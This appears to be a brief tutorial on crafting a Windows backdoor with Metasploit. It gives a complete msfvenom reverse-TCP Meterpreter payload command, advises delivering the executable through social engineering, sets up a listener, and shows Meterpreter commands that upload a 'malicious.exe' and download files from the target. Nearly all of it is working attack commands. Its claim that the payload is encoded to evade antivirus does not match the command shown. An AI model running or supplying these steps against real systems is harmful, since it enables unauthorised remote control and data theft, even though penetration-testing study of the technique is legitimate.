Crafting Backdoors with Metasploit

Crafting Backdoors with Metasploit

Disclaimer: This guide is for educational purposes only. Unauthorized use of these techniques for hacking activities is illegal.

Metasploit is a crucial tool for penetration testing, providing a robust environment for creating and deploying stealthy backdoors. This guide covers payload creation and evasion techniques using Metasploit.

Lab Setup

Network Layout:

  • Attacker: Kali Linux

    • IP: 10.0.1.50
  • Target: Windows 10/11

    • IP: 10.0.1.20

Building a Covert Backdoor with msfvenom

Step 1: Generate the Payload

Create a reverse TCP payload and encode it to avoid antivirus detection:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.50 LPORT=4444 -f exe > /root/hidden_backdoor.exe

Step 2: Deploy the Payload

Transfer hidden_backdoor.exe to the Windows machine using social engineering tactics.

Step 3: Initiate the Listener

Configure Metasploit to listen for the payload's connection:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit

Executing the backdoor on the target system will initiate a Meterpreter session.

Transferring Files with Meterpreter

With an active Meterpreter session, you can easily transfer files.

Upload Files to the Target

Ensure the Meterpreter session is active:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.1.50
set LPORT 4444
exploit

Transfer a file:

upload /root/malicious.exe C:\\Users\\Public\\malicious.exe

Download Files from the Target

Retrieve a file:

download C:\\Users\\Public\\data.txt /root/data.txt

Useful Meterpreter Commands

  • List Files:

      ls
    
  • Change Directory:

      cd C:\\Users\\Public
    

Summary

Using Metasploit, you can create and deploy backdoors, and manage files efficiently with Meterpreter. Always adhere to ethical guidelines and legal requirements during penetration testing.